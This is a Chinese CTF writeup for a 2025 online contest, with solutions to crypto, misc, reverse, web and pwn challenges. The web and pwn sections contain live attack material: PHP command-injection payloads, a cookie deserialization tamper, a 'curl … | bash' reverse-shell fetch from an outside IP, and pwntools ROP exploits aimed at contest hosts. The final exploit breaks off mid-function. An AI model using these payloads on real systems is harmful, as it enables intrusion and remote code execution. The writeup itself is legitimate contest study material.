2025第九届御网杯线上赛Writeup

2025御网杯Writeup

• 根本来不及写wp，急死我了QAQ

Crypto

1、baby_rsa

from gmpy2 import iroot, next_prime, invert, powmod
from Crypto.Util.number import long_to_bytes

def factor_n(n):
    """Attempt to factor n by taking square root and finding next prime"""
    root = iroot(n, 2)[0]
    p = next_prime(root)
    q = n // p
    return p, q

def decrypt(ciphertext, e, p, q):
    """Decrypt RSA ciphertext given p and q"""
    phi = (p - 1) * (q - 1)
    d = invert(e, phi)
    plaintext = powmod(ciphertext, d, p * q)
    return plaintext

def main():
    # Given values
    n = 12194420073815392880989031611545296854145241675320130314821394843436947373331080911787176737202940676809674543138807024739454432089096794532016797246441325729856528664071322968428804098069997196490382286126389331179054971927655320978298979794245379000336635795490242027519669217784433367021578247340154647762800402140321022659272383087544476178802025951768015423972182045405466448431557625201012332239774962902750073900383993300146193300485117217319794356652729502100167668439007925004769118070105324664379141623816256895933959211381114172778535296409639317535751005960540737044457986793503218555306862743329296169569
    e = 65537
    c = 4504811333111877209539001665516391567038109992884271089537302226304395434343112574404626060854962818378560852067621253927330725244984869198505556722509058098660083054715146670767687120587049288861063202617507262871279819211231233198070574538845161629806932541832207041112786336441975087351873537350203469642198999219863581040927505152110051313011073115724502567261524181865883874517555848163026240201856207626237859665607255740790404039098444452158216907752375078054615802613066229766343714317550472079224694798552886759103668349270682843916307652213810947814618810706997339302734827571635179684652559512873381672063

    # Factor n
    p, q = factor_n(n)
    
    # Verify factorization
    print(f"p = {p}")
    print(f"q = {q}")
    print(f"Verification: p*q == n? {p*q == n}")
    
    # Decrypt
    plaintext = decrypt(c, e, p, q)
    print("Decrypted message:")
    print(long_to_bytes(plaintext))

if __name__ == "__main__":
    main()

2、cry_rsa

以下是计算RSA私钥指数 d 并生成flag的Python脚本：

import math

def extended_gcd(a, b):
    if b == 0:
        return (a, 1, 0)
    else:
        g, x, y = extended_gcd(b, a % b)
        return (g, y, x - (a // b) * y)

def modinv(a, m):
    g, x, y = extended_gcd(a, m)
    if g != 1:
        return None  # No inverse exists if a and m are not coprime
    else:
        return x % m

# Given values
p = 473398607161
q = 4511491
e = 19

# Calculate n and φ(n)
n = p * q
phi_n = (p - 1) * (q - 1)

# Compute d (modular inverse of e mod φ(n))
d = modinv(e, phi_n)

if d is not None:
    flag = d + 8
    print(f"d = {d}")
    print(f"flag = flag{{{flag}}}")
else:
    print("No modular inverse exists for the given e and φ(n).")

解释：

1. **extended_gcd(a, b)**：使用扩展欧几里得算法求解 ax + by = gcd(a, b)，返回 (gcd, x, y)。
2. **modinv(a, m)**：计算 a 在模 m 下的乘法逆元（即 a⁻¹ mod m）。如果逆元不存在（gcd(a, m) ≠ 1），返回 None。
3. 计算步骤：
   1. 计算 n = p * q 和 φ(n) = (p-1)(q-1)。
   2. 用 modinv(e, phi_n) 求解 d（即 e⁻¹ mod φ(n)）。
   3. 最终flag是 d + 8。

import math

def extended_gcd(a, b):
    if b == 0:
        return (a, 1, 0)
    else:
        g, x, y = extended_gcd(b, a % b)
        return (g, y, x - (a // b) * y)

def modinv(a, m):
    g, x, y = extended_gcd(a, m)
    if g != 1:
        return None  # No inverse exists if a and m are not coprime
    else:
        return x % m

# Given values
p = 473398607161
q = 4511491
e = 19

# Calculate n and φ(n)
n = p * q
phi_n = (p - 1) * (q - 1)

# Compute d (modular inverse of e mod φ(n))
d = modinv(e, phi_n)

if d is not None:
    flag = d + 8
    print(f"d = {d}")
    print(f"flag = flag{{{flag}}}")
else:
    print("No modular inverse exists for the given e and φ(n).")

3、ez_base

Dear Friend ; Especially for you - this amazing announcement 
. This is a one time mailing there is no need to request 
removal if you won't want any more ! This mail is being 
sent in compliance with Senate bill 2316 , Title 1 
; Section 303 ! This is not a get rich scheme . Why 
work for somebody else when you can become rich in 
77 months . Have you ever noticed society seems to 
be moving faster and faster and more people than ever 
are surfing the web ! Well, now is your chance to capitalize 
on this ! We will help you turn your business into 
an E-BUSINESS and sell more . You can begin at absolutely 
no cost to you . But don't believe us . Ms Ames who 
resides in Indiana tried us and says "Now I'm rich, 
Rich, RICH" . We are licensed to operate in all states 
. If not for you then for your LOVED ONES - act now 
! Sign up a friend and you'll get a discount of 30% 
! Thank-you for your serious consideration of our offer 
. Dear Salaryman ; This letter was specially selected 
to be sent to you ! This is a one time mailing there 
is no need to request removal if you won't want any 
more . This mail is being sent in compliance with Senate 
bill 1619 , Title 6 ; Section 303 ! This is not a get 
rich scheme ! Why work for somebody else when you can 
become rich within 50 DAYS ! Have you ever noticed 
how long the line-ups are at bank machines plus nobody 
is getting any younger . Well, now is your chance to 
capitalize on this ! WE will help YOU process your 
orders within seconds & SELL MORE . You can begin at 
absolutely no cost to you ! But don't believe us ! 
Mrs Ames of Minnesota tried us and says "I've been 
poor and I've been rich - rich is better" ! We are 
licensed to operate in all states ! We BESEECH you 
- act now ! Sign up a friend and you'll get a discount 
of 60% . Thank-you for your serious consideration of 
our offer . Dear Internet user , Especially for you 
- this hot news ! We will comply with all removal requests 
! This mail is being sent in compliance with Senate 
bill 1623 ; Title 2 , Section 309 ! THIS IS NOT A GET 
RICH SCHEME . Why work for somebody else when you can 
become rich within 29 weeks . Have you ever noticed 
people love convenience & nearly every commercial on 
television has a .com on in it ! Well, now is your 
chance to capitalize on this . We will help you increase 
customer response by 160% and deliver goods right to 
the customer's doorstep ! You can begin at absolutely 
no cost to you ! But don't believe us . Mr Jones of 
California tried us and says "My only problem now is 
where to park all my cars" ! We are licensed to operate 
in all states . We implore you - act now ! Sign up 
a friend and you get half off . Thanks . 

https://www.spammimic.com/decode.shtml

ZmxhZ3tITkNURlpJaUZXQTlmUko2VEZ9

4、gift

五一劳动节爸爸给家里人带了一个礼物。由于礼物不好拿，所以把礼物平均分成了四份，但是其中一份不小心掉在地上散落成了无数片，变成了 1 - 1/3 + 1/5 - 1/7 + …
聪明的你能算出或猜出爸爸带的礼物是什么吗？flag示例: flag{apple} flag{watermelon}  提交flag值凯撒密码加密，偏移量5在提交。

加密过程

以flag{pie}为例：

• { → {（非字母不变）
• p → u
• i → n
• e → j
• } → }（非字母不变）

提交的flag值为：flag{unj}

5、草甸方阵的密语

• 先凯撒，再栅栏

6、easy-签到题

• 随波逐流

MISC

7、ez_picture

• 随波逐流看图片

• 解压

• 查看图片详细信息

ZmxhZ3tITkNURlBmSlgzbkdDaXQ1fQ==

flag{HNCTFPfJX3nGCit5}

8、easy_misc

• 查看密文

77 49 66 77 83 107 104 68 78 70 81 50 90 50 104 87 98 87 74 76 82 69 90 53 99 88 100 50 86 87 116 81 84 70 86 78 86 122 86 70 98 48 85 61 

• 随波逐流一把嗦

• 随波逐流二把嗦

synt{UAPGSQFaDfY1QCmSa}

• 随波逐流三把嗦

• 终于嗦出来了

9、套娃

• 最里面的修改为.doc后缀
• 修改字体颜色

10、ez_xor

1. 题目分析：题目给出的密文是 5f-55-58-5e-42-71-7a-6d-7f-48-4e-5c-78-6a-7d-08-08-00-44，这是一个十六进制格式的字符串。题目名称 ez_xor 提示我们可能使用了异或加密。
2. 异或****加密原理：异或加密是一种对称加密方法，加密和解密使用相同的密钥。加密过程为 密文 = 明文 ^ 密钥，解密过程为 明文 = 密文 ^ 密钥。
3. 解题步骤：
   1. 将十六进制字符串转换为字节序列。
   2. 猜测或尝试常见的异或密钥（如单字节密钥）。
   3. 对密文进行异或操作，尝试解密出有意义的明文（flag）。
4. 脚本：

cipher = bytes.fromhex("5f55585e42717a6d7f484e5c786a7d08080044")
for key in range(256):  # 尝试所有可能的单字节密钥
    decrypted = bytes([b ^ key for b in cipher])
    if b"flag" in decrypted or b"FLAG" in decrypted:
        print(f"Key: {key}, Flag: {decrypted.decode()}")

11、光隙中的寄生密钥

• 随波逐流binwalk提取

• ARCHPR爆破压缩包密码
• 9864

5a6d78685a33744861435134544731514e56356b55544a6d546a596d66513d3d

ZmxhZ3tHaCQ4TG1QNV5kUTJmTjYmfQ==

flag{Gh$8LmP5^dQ2fN6&}

12、被折叠的显影图纸

• 随波逐流一把嗦

Re

13、ez_math

from sage.all import PolynomialRing, QQ
from scipy.optimize import least_squares
import numpy as np

def solve_flag():
    # 创建多项式环
    R = PolynomialRing(QQ, 38, 'x')
    x = R.gens()
    
    # 已知flag格式
    known = {
        x[0]: 102,  # 'f'
        x[1]: 108,  # 'l'
        x[2]: 97,   # 'a'
        x[3]: 103,  # 'g'
        x[4]: 123,  # '{'
        x[37]: 125  # '}'
    }
    
    # 多项式方程组（示例）
    eqs = [
        x0 * x16 + x10 * x18 + 2 * (x11 * x25) + 5 * (x13 * x25) - 9 * (x13 * x32) - 8 * (x15 * x29) + 8 * (x17 * x28) + 7 * (x19 * x29) - 5 * (x19 * x30) - 7 * (x19 * x9) - 4 * x20 * x20 + 7 * (x22 * x23) - 5 * (x23 * x8) - 8 * (x29 * x5) - 7 * x31 + 7 * (x32 * x9) + 10 * (x33 * x4) + 8 * x5 * x5 - 5 * x8 * x8 - 16191 ,
-9 * (x1 * x15) - 2 * (x10 * x18) + 9 * (x11 * x18) - 6 * (x12 * x16) - x14 * x15 - 3 * (x15 * x18) - 9 * (x16 * x8) + 10 * (x17 * x23) + 4 * (x17 * x5) - 2 * (x2 * x22) - 4 * x2 + 4 * (x21 * x3) + 10 * (x23 * x25) + 5 * (x28 * x33) + 10 * (x28 * x5) - 8 * (x30 * x36) - 14067 ,
10 * (x0 * x26) + 6 * (x0 * x29) - 7 * (x13 * x29) + 8 * (x21 * x7) + 9 * (x22 * x25) - 8 * (x23 * x5) + 8 * (x26 * x32) + 5 * (x27 * x30) + 9 * (x27 * x31) + 6 * (x28 * x6) - 9 * (x29 * x5) - 4 * (x31 * x8) - 10 * (x32 * x35) + 10 * x35 * x35 - 55102 ,
3 * (x0 * x16) + 4 * (x1 * x36) + 8 * (x10 * x33) - 8 * (x12 * x17) - 8 * (x14 * x28) + 7 * (x15 * x25) - 2 * (x15 * x6) + 6 * (x15 * x8) - 2 * (x2 * x25) - 7 * (x2 * x34) + x23 * x35 - 5 * (x27 * x9) + 6 * (x28 * x30) + 6 * (x28 * x37) + 8 * (x28 * x7) - 4 * x30 + 7 * (x32 * x35) + 7 * (x35 * x5) + 7 * (x35 * x7) - 10 * (x5 * x7) - 2 * (x7 * x9) - 102697 ,
7 * (x0 * x27) + 3 * (x1 * x15) - 9 * (x1 * x29) - 3 * (x10 * x33) - 10 * (x12 * x34) - 8 * (x15 * x2) - 8 * (x18 * x23) - 6 * (x19 * x7) - 6 * (x2 * x34) + 7 * (x2 * x7) - 3 * (x20 * x22) - 8 * (x23 * x25) - 3 * (x26 * x34) - 9 * (x28 * x3) - 8 * (x28 * x35) + 3 * (x36 * x4) + 6 * x8 + 324145 ,
-9 * (x0 * x2) + 5 * x1 - 9 * (x13 * x3) + 4 * (x14 * x17) + 9 * (x18 * x29) + 5 * (x18 * x9) + 5 * (x20 * x23) - x20 * x5 - 8 * (x21 * x33) - 7 * x27 + 6 * (x28 * x7) - 7 * (x29 * x9) + 10 * (x31 * x6) + 52822 ,
-6 * (x10 * x29) - 2 * (x10 * x33) + 4 * (x11 * x31) + 8 * (x12 * x27) - 9 * (x12 * x36) + 2 * (x16 * x24) + 2 * (x19 * x34) - 8 * (x19 * x37) - 10 * (x24 * x7) - 5 * (x34 * x6) - 2 * (x7 * x8) + 9 * x9 + 119387 ,
6 * (x0 * x22) - 3 * (x12 * x37) - 3 * (x12 * x5) - 2 * (x13 * x36) - 10 * (x19 * x5) + 7 * (x2 * x22) + 7 * (x2 * x9) - 8 * x21 * x21 + x21 * x34 - 5 * (x23 * x26) + 9 * (x25 * x5) + 8 * (x25 * x9) + 4 * (x3 * x30) - 3 * (x37 * x7) - 6 * (x37 * x9) + 4832 ,
-2 * x0 * x0 + 3 * (x13 * x29) + x17 * x25 - 10 * (x21 * x28) + 5 * (x22 * x31) + 10 * (x22 * x9) - 10 * (x25 * x32) + 4 * x27 + 6 * (x29 * x6) - 4 * (x30 * x34) - 9 * (x31 * x4) + 2 * (x32 * x34) - 7 * (x4 * x6) + 123454 ,
4 * (x0 * x20) + x0 * x3 - 9 * (x1 * x17) + 9 * (x11 * x34) - 6 * (x13 * x7) - 6 * (x14 * x2) + 6 * (x14 * x29) + 7 * (x15 * x27) - 7 * (x18 * x5) - 7 * x20 * x20 + 8 * (x20 * x21) + 9 * (x20 * x27) + 2 * (x21 * x25) - 6 * (x25 * x28) - 9 * (x28 * x32) - 6 * (x3 * x32) - 3 * (x33 * x7) - 8 * (x36 * x9) + 170296 ,
6 * (x0 * x11) + x1 * x12 - 9 * (x1 * x30) - 10 * (x1 * x35) + 8 * (x10 * x7) + 5 * (x14 * x28) + 7 * (x16 * x21) - 10 * (x19 * x35) + x19 * x6 + 8 * (x2 * x31) - 2 * (x21 * x26) - 3 * (x23 * x27) + 9 * (x27 * x34) + 4 * x28 * x28 - x3 * x31 + x30 * x37 - 9 * (x30 * x4) + 4 * x34 - 76173 ,
-8 * (x0 * x15) - 4 * (x11 * x15) + 9 * (x12 * x23) - 10 * (x12 * x29) + 8 * (x13 * x26) + 6 * (x13 * x9) - x15 * x27 - x15 * x33 + 3 * (x19 * x29) - 10 * (x2 * x20) - x22 * x32 + 5 * (x23 * x8) + 6 * (x32 * x5) - 27078 ,
8 * (x1 * x9) + 8 * (x10 * x16) - 3 * (x10 * x29) - 2 * (x11 * x13) + 6 * (x11 * x33) + 3 * (x12 * x14) + 8 * (x12 * x16) + 5 * (x16 * x34) + 7 * (x18 * x32) + 8 * (x19 * x26) + 2 * x19 - 4 * (x20 * x6) + 4 * x22 * x22 - 8 * (x25 * x5) - 7 * (x26 * x34) - x29 + 10 * (x3 * x4) - 6 * x32 * x32 - 299677 ,
3 * (x0 * x6) + 7 * (x10 * x34) + 9 * (x11 * x18) - 8 * (x12 * x3) - x12 * x33 - x12 * x34 - 7 * (x16 * x7) + x16 * x8 - 3 * (x19 * x20) - 6 * (x19 * x33) - 8 * (x22 * x27) - 4 * (x24 * x3) + 57797 ,
9 * (x0 * x29) + 2 * (x1 * x19) + 8 * (x10 * x30) - 2 * (x11 * x20) - 6 * (x11 * x29) + 3 * (x13 * x20) - 10 * (x14 * x17) - 10 * (x15 * x19) + 6 * (x15 * x23) + 7 * (x15 * x4) + 6 * (x18 * x28) + x19 * x3 - x20 * x3 - 10 * (x21 * x30) + 10 * (x22 * x27) - 10 * (x23 * x31) + 2 * (x24 * x5) - 3 * (x25 * x31) + 5 * (x26 * x7) + 7 * x3 * x3 + 7 * (x30 * x32) + 6 * (x31 * x5) + 10 * x33 - 7 * x5 - 258015 ,
2 * (x0 * x16) - 6 * (x1 * x20) + 5 * (x10 * x17) - 5 * (x15 * x23) + 8 * (x16 * x18) + 9 * (x19 * x36) + 6 * (x2 * x33) - 9 * (x23 * x9) + 9 * x25 * x25 + 2 * (x3 * x37) + 7 * (x30 * x34) - 2 * x32 - 157310 ,
-3 * (x0 * x25) - 2 * (x1 * x36) + 2 * (x10 * x31) + 9 * (x13 * x20) - 5 * (x15 * x2) - 6 * (x15 * x37) - 2 * x17 + 8 * (x19 * x28) + 7 * (x2 * x32) - 2 * (x21 * x30) + 5 * (x23 * x5) + 5 * (x24 * x26) - 8 * (x24 * x33) - 8 * (x26 * x35) - 10 * x26 - 10 * (x29 * x36) - 2 * (x30 * x6) + 4 * (x31 * x36) + 9 * (x33 * x9) - x37 * x6 + 7350 ,
-8 * (x0 * x36) - 8 * (x17 * x32) + 8 * (x2 * x33) - 7 * (x22 * x28) - 9 * (x22 * x35) + 8 * (x22 * x5) - 2 * (x23 * x5) + 5 * (x26 * x27) + 6 * (x26 * x31) - 3 * (x32 * x33) - 2 * (x35 * x4) + x36 * x8 + 85362 ,
7 * (x0 * x33) - 5 * (x12 * x35) + x12 * x9 + 10 * (x13 * x30) + 8 * (x15 * x32) - 9 * (x2 * x20) + 3 * (x2 * x30) + 10 * (x25 * x29) - 6 * (x26 * x32) - 3 * (x27 * x9) + 7 * (x36 * x6) - 121182 ,
8 * (x0 * x17) + 10 * (x1 * x14) + 2 * (x10 * x33) + 8 * (x13 * x26) - 5 * (x14 * x34) - 9 * (x14 * x7) + x18 * x2 - 10 * (x18 * x7) + x2 * x33 + 10 * x20 - 6 * (x22 * x30) + 6 * (x22 * x9) + 10 * (x23 * x34) + 9 * (x25 * x9) + 7 * (x26 * x30) - 9 * (x27 * x31) + 7 * (x28 * x5) - 8 * (x30 * x31) - 9 * x34 * x34 + 2 * (x36 * x8) - 136304 ,
-4 * (x0 * x25) - 9 * (x1 * x21) - 9 * (x1 * x25) + 6 * (x12 * x5) + 6 * (x2 * x28) - 4 * (x20 * x28) - 8 * (x22 * x23) + 5 * (x23 * x32) - 6 * (x24 * x28) - 6 * (x25 * x29) + 121526 ,
-4 * (x0 * x30) + x11 * x14 - 6 * (x12 * x20) - 8 * (x13 * x28) + 10 * (x15 * x2) - 10 * (x18 * x25) + 6 * (x22 * x29) - 3 * (x25 * x8) + x27 * x36 - 2 * (x3 * x30) + 10 * (x30 * x34) + 4 * (x35 * x6) - 27523 ,
-9 * (x10 * x30) - 3 * (x10 * x6) - 10 * (x13 * x29) - 8 * (x13 * x7) + 3 * (x14 * x32) - 2 * (x18 * x20) + 10 * (x18 * x34) - 4 * (x2 * x7) + 9 * (x20 * x22) - 5 * (x20 * x33) - 10 * (x23 * x34) - 6 * x26 + 2 * (x3 * x34) + 9 * x30 * x30 + 8 * (x31 * x8) + 9 * (x33 * x36) + 35830 ,
7 * (x10 * x2) + 2 * x10 - 5 * (x13 * x9) + 10 * (x15 * x33) + 8 * (x17 * x23) + 5 * x2 * x2 - 8 * (x2 * x37) + 6 * (x20 * x24) + 4 * (x20 * x35) - 8 * (x23 * x8) - 9 * (x24 * x7) + 7 * (x26 * x8) - 5 * (x3 * x36) + 6 * (x30 * x35) - 7 * x36 - 5 * x7 - 59235 ,
-8 * x11 * x11 - 9 * (x14 * x31) - 8 * (x14 * x35) + 7 * (x15 * x20) + x15 * x24 + 6 * (x15 * x25) - 10 * (x16 * x18) - x16 * x9 + 8 * (x19 * x32) + 5 * (x2 * x5) + 6 * (x21 * x30) - 10 * (x22 * x24) + 2 * (x22 * x34) - 10 * (x22 * x37) + 4 * (x27 * x35) - x28 * x33 + 2 * (x28 * x37) + 7 * (x29 * x37) - 2 * (x34 * x35) - 7 * (x35 * x6) + 82407 ,
7 * (x0 * x27) + 7 * (x10 * x21) - 10 * (x10 * x3) + 6 * (x13 * x36) - 3 * (x15 * x17) + 7 * (x15 * x30) - x15 * x7 + x16 * x34 + 8 * (x17 * x37) + 2 * x2 + 6 * (x20 * x21) + 9 * (x20 * x33) + 8 * (x20 * x4) + 3 * (x21 * x25) + x22 * x28 + 6 * x23 * x23 - 6 * (x24 * x3) + 10 * (x25 * x27) + 5 * (x29 * x4) - 6 * (x3 * x32) - 6 * (x30 * x4) - 5 * (x30 * x5) - x33 * x34 - 7 * (x4 * x9) - 4 * (x7 * x9) - 154206 ,
2 * x0 * x0 + 2 * (x0 * x14) + 7 * (x11 * x13) - 9 * (x11 * x16) + 2 * (x11 * x21) + 8 * (x11 * x24) + 5 * (x11 * x4) + 4 * (x13 * x36) - 8 * (x15 * x16) - 4 * (x16 * x17) - 3 * (x16 * x23) - 8 * (x17 * x33) - 4 * (x17 * x34) - 6 * (x18 * x31) + 7 * (x2 * x25) - x20 * x25 + 5 * (x20 * x9) + 2 * (x21 * x26) - 5 * (x21 * x5) + 4 * (x22 * x35) - 7 * (x23 * x9) - 10 * (x31 * x7) + 156020 ,
-5 * (x12 * x34) + 4 * (x12 * x9) - 2 * (x13 * x31) + x14 * x9 + 4 * (x17 * x32) - 2 * (x18 * x23) - 10 * (x18 * x29) + 6 * (x19 * x30) + 4 * (x2 * x32) - 9 * x27 * x27 - 2 * (x3 * x35) - 2 * (x3 * x5) - 2 * (x7 * x8) + 129397 ,
-9 * x1 + 5 * (x12 * x2) + 4 * (x12 * x35) - 5 * (x14 * x8) + 2 * x15 + 3 * (x17 * x22) - 3 * (x17 * x23) + 9 * (x18 * x33) - 5 * (x20 * x23) - 8 * (x20 * x34) - 8 * (x29 * x6) + 70585 ,
x0 * x1 + 6 * (x0 * x12) + 10 * (x10 * x31) + 8 * (x11 * x32) + 9 * (x13 * x14) - 2 * (x15 * x33) - 9 * (x15 * x9) + 4 * (x16 * x9) - 2 * (x18 * x29) - 5 * (x2 * x36) + 2 * (x21 * x32) - 8 * (x24 * x33) + 9 * (x25 * x26) + x26 * x28 - x26 * x3 - 3 * (x26 * x6) + 6 * x29 - 2 * (x37 * x7) - 119430 ,
x0 * x2 + 10 * x10 + 6 * (x12 * x18) - 5 * (x12 * x35) + 9 * (x13 * x29) - 2 * (x14 * x37) + 10 * (x15 * x23) + 7 * (x15 * x4) - 5 * (x16 * x9) - 9 * (x20 * x8) - 4 * (x21 * x27) - 5 * (x22 * x5) + x28 * x6 + x3 * x36 + 8 * (x33 * x35) - 144386 ,
-5 * (x1 * x12) + 4 * (x1 * x6) + 4 * (x11 * x5) + 8 * (x15 * x20) + 7 * (x15 * x22) - 10 * (x19 * x29) - 6 * x2 * x2 + 5 * (x2 * x31) - 2 * (x2 * x9) + 2 * (x20 * x35) + 7 * (x29 * x5) + 8 * (x30 * x7) + 8 * (x35 * x4) - 2 * x37 * x37 - 99154 ,
-2 * x0 * x0 + 5 * (x0 * x11) - 10 * (x0 * x21) + 9 * (x0 * x30) - 2 * (x1 * x29) + 6 * (x10 * x29) - 9 * (x10 * x30) - 8 * (x10 * x32) + 9 * x11 * x11 - 9 * (x11 * x5) - x13 * x17 + 5 * (x13 * x6) + 9 * (x14 * x20) - 10 * x18 * x18 - 5 * (x19 * x24) + 7 * (x2 * x26) + 10 * (x20 * x21) - 9 * (x24 * x34) - 5 * (x24 * x5) - 9 * (x26 * x32) - 6 * (x30 * x7) - 7 * (x32 * x37) + 414339 ,
2 * (x0 * x21) - 10 * (x0 * x35) + 9 * (x11 * x15) - 2 * (x12 * x4) + 4 * (x16 * x4) + 2 * (x17 * x32) - 8 * (x2 * x20) + 10 * (x21 * x23) + 2 * (x21 * x27) - 5 * (x21 * x30) + 8 * (x22 * x30) + 2 * (x25 * x4) + 9 * (x28 * x34) + 3 * (x30 * x5) + 4 * (x33 * x7) - 3 * (x6 * x8) - 169458 ,
x10 * x31 - 4 * (x10 * x4) - x11 * x22 - 10 * (x12 * x5) - 4 * (x16 * x19) + 3 * (x19 * x2) + 3 * (x19 * x34) - 6 * x19 + 4 * (x2 * x32) - 8 * (x22 * x33) + 8 * x23 * x23 + 2 * (x24 * x6) + 8 * x31 + 2 * (x5 * x7) - 26425 ,
8 * (x1 * x35) - 3 * (x1 * x7) - 3 * (x14 * x23) - 6 * (x16 * x28) - 2 * (x16 * x6) - 7 * x16 + 4 * (x2 * x4) + x21 * x24 - 5 * (x23 * x3) - 9 * (x24 * x30) + 9 * (x26 * x35) - 8 * (x28 * x4) - 9 * (x3 * x32) + 2 * x3 + 209624 ,
-10 * (x0 * x28) + 2 * (x0 * x3) + 8 * (x10 * x30) - x11 * x31 + 6 * (x13 * x32) + 10 * (x14 * x36) + 5 * (x15 * x23) + 2 * (x15 * x31) + 2 * (x16 * x25) + 10 * (x16 * x30) - 10 * (x18 * x22) + 8 * (x19 * x6) - 7 * (x2 * x36) - x21 * x29 - 4 * (x24 * x4) + 8 * (x26 * x5) + 10 * (x31 * x5) - 5 * (x32 * x7) - 4 * (x36 * x5) - 146637 ,
-2 * (x1 * x23) + 9 * (x10 * x9) + 9 * (x15 * x21) + 10 * (x16 * x25) + 5 * (x16 * x36) + 7 * (x16 * x6) + 7 * (x18 * x35) + 8 * (x19 * x3) - 9 * (x19 * x35) + 10 * (x2 * x32) + 5 * (x2 * x4) - x21 * x27 - 6 * (x24 * x35) - 3 * (x25 * x26) + 6 * (x29 * x36) + 6 * (x29 * x4) - 3 * (x33 * x4) - 5 * (x34 * x5) - 3 * (x37 * x7) + 9 * (x4 * x8) - 422738 ,
    ]
    
    # 简化方程
    remaining_vars = [v for v in x if v not in known]
    simplified = [eq.subs(known) for eq in eqs]
    
    # 数值优化求解
    def objective(vars):
        values = dict(zip(remaining_vars, vars))
        return [float(eq.subs(values)) for eq in simplified]
    
    sol = least_squares(objective, [100]*len(remaining_vars), method='lm')
    
    # 生成flag
    flag = []
    for i in range(38):
        val = known.get(x[i], sol.x[remaining_vars.index(x[i])] if x[i] in remaining_vars else 0)
        flag.append(chr(max(32, min(126, int(round(val))))))
    
    print("Possible flag:", ''.join(flag))

solve_flag()

15、sign in

• IDA打开

• 打断点在rc4加密函数结束
• 看加密结果

Web

17、YWB_Web_xff

• Yakit抓包
• 添加 X-Forwarded-For: 2.2.2.1

POST / HTTP/1.1
Host: 47.105.113.86:40001
Cookie: user=O%3A5%3A%22Admin%22%3A2%3A%7Bs%3A4%3A%22name%22%3Bs%3A5%3A%22guest%22%3Bs%3A7%3A%22isAdmin%22%3Bb%3A0%3B%7D
Priority: u=0, i
X-Forwarded-For: 2.2.2.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Origin: http://47.105.113.86:40001
Content-Type: application/x-www-form-urlencoded
Referer: http://47.105.113.86:40001/
Upgrade-Insecure-Requests: 1
Cache-Control: no-cache
Content-Length: 29

username=admin&password=admin

18、YWB_Web_命令执行过滤绕过

?cmd=print(base64_encode(file_get_contents('flag.php')));

<?
$filename = "/tmp/flag.nisp";
$content = trim(file_get_contents($filename));
?>
http://47.105.113.86:40002/?cmd=print(base64_encode(file_get_contents(%27/tmp/flag.nisp%27)));

19、YWB_Web_未授权访问

O:5:"Admin":2:{s:4:"name";s:5:"guest";s:7:"isAdmin";b:0;}

修改为

O:5:"Admin":2:{s:4:"name";s:5:"guest";s:7:"isAdmin";b:1;}

%4f%3a%35%3a%22%41%64%6d%69%6e%22%3a%32%3a%7b%73%3a%34%3a%22%6e%61%6d%65%22%3b%73%3a%35%3a%22%67%75%65%73%74%22%3b%73%3a%37%3a%22%69%73%41%64%6d%69%6e%22%3b%62%3a%31%3b%7d

• 替换到cookie

20、YWB_Web_反序列化

<?php
class mylogin {
    var $user;
    var $pass;
    
    function __construct($user, $pass) {
        $this->user = $user;
        $this->pass = $pass;
    }
}

// 创建对象，设置正确的密码
$obj = new mylogin("anyuser", "myzS@11wawq");

// 序列化对象
$serialized = serialize($obj);

// 输出payload
echo "Payload: " . $serialized . "\n";

// 测试过滤后的效果
function filter($name) {
    $safe = array("flag", "php");
    return str_replace($safe, "hack", $name);
}

$filtered = filter($serialized);
echo "After filter: " . $filtered . "\n";

// 测试反序列化
$unserialized = unserialize($filtered);
if ($unserialized instanceof mylogin) {
    echo "Unserialized successfully!\n";
    echo "Password: " . $unserialized->pass . "\n";
} else {
    echo "Unserialization failed!\n";
}
?>

O:7:"mylogin":2:{s:4:"user";s:7:"anyuser";s:4:"pass";s:11:"myzS@11wawq";}

21、easyweb

<?php

if(isset($_POST['cmd'])){
    @exec($_POST['cmd'],$res,$rc);
    //echo $rc;
}else{
    echo "It works!";
}

show_source(__FILE__);
?>

1. 分析代码漏洞：

   1. 代码中存在exec($_POST['cmd'],$res,$rc)，直接执行用户通过POST传递的cmd参数，存在命令注入漏洞。
   2. 题目已提示flag位于/flag.txt，无需额外路径猜测。

2. 利用方法：

   1. 通过发送POST请求，在cmd参数中注入读取/flag.txt的命令（如cat /flag.txt）。

   2. 使用工具（如curl、Burp Suite或Python脚本）发送请求。例如：

      • curl -X POST http://47.105.113.86:40005/ --data-urlencode "cmd=XXXXXXXX"
        - 反弹shell
        
        ```Plain
        curl -X POST http://47.105.113.86:40005/ --data-urlencode "cmd=curl http://8.138.152.157/1.txt | bash"
        

• 成功弹shell

Pwn

14、Canary

from pwn import *

def exploit():
    p = remote('47.105.113.86', 30001)
    sys_addr = 0x401581
    payload = b'a'*(88+16) + p64(0) + p64(0) + p64(sys_addr)
    
    p.recvuntil('your choice')
    p.sendline('1')
    p.recvuntil('code:')
    p.sendline(payload)
    
    p.recvuntil('your choice')
    p.sendline('2')
    p.sendline('3')
    p.interactive()

if __name__ == '__main__':
    exploit()

15、ez_pwn

• EXP

from pwn import *

def setup_context():
    context(arch='amd64', os='linux', log_level='debug')

def init_connections():
    p = process("./pwn")
    p = remote("47.105.113.86", 30003)
    return p

def load_binaries():
    elf = ELF("./pwn")
    libc = ELF("./libc-2.31.so")
    return elf, libc

def build_first_payload(elf):
    gadgets = {
        'pop_rdi': 0x4012c3,
        'pop_rsi_r15': 0x4012c1,
        'main_addr': 0x4011DD,
        'ret': 0x40101a
    }
    
    payload = flat(
        0x28 * b'a',
        p64(gadgets['ret']),
        p64(gadgets['pop_rdi']), p64(2),
        p64(gadgets['pop_rsi_r15']), p64(elf.got['write']), p64(0),
        p64(elf.plt['write']),
        p64(gadgets['main_addr'])
    )
    return payload

def build_final_payload(libc_base, libc):
    system_addr = libc_base + libc.symbols['system']
    bin_sh_addr = libc_base + next(libc.search(b"/bin/sh"))
    
    payload = flat(
        0x28 * b'a',
        p64(0x40101a),  # ret for stack alignment
        p64(0x4012c3),  # pop rdi
        p64(bin_sh_addr),
        p64(system_addr)
    )
    return payload

def main():
    setup_context()
    p = init_connections()
    elf, libc = load_binaries()
    
    # First stage: leak libc address
    first_payload = build_first_payload(elf)
    p.sendlineafter("Close your eye, and you are blind now.", first_payload)
    
    leak = u64(p.recv(6).ljust(8, b'\x00'))
